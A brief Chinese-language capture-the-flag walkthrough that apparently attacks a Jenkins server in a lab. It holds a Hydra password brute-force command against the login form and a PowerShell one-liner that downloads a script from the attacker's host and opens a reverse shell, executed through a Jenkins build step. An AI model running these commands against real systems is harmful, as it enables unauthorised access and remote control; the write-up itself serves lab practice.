这边80端口没什么有用的信息,看一眼8080
一个登陆界面
抓包得到一些登录信息,尝试爆破
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.78.108 -s 8080 http-post-form "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^:F=Invalid" -V -t 64 -I
这里我为了方便直接尝试用户名为admin,得到密码也是admin
Stage2获取shell权限 下载
开启http.server,在本地开启监听
powershell iex (New-Object Net.WebClient).DownloadString('<http://10.17.24.202:80/Invoke-PowerShellTcp.ps1>');Invoke-PowerShellTcp -Reverse -IPAddress 10.17.24.202 -Port 4443
在项目的配置选项进行配置,然后应用和保存
这里build now
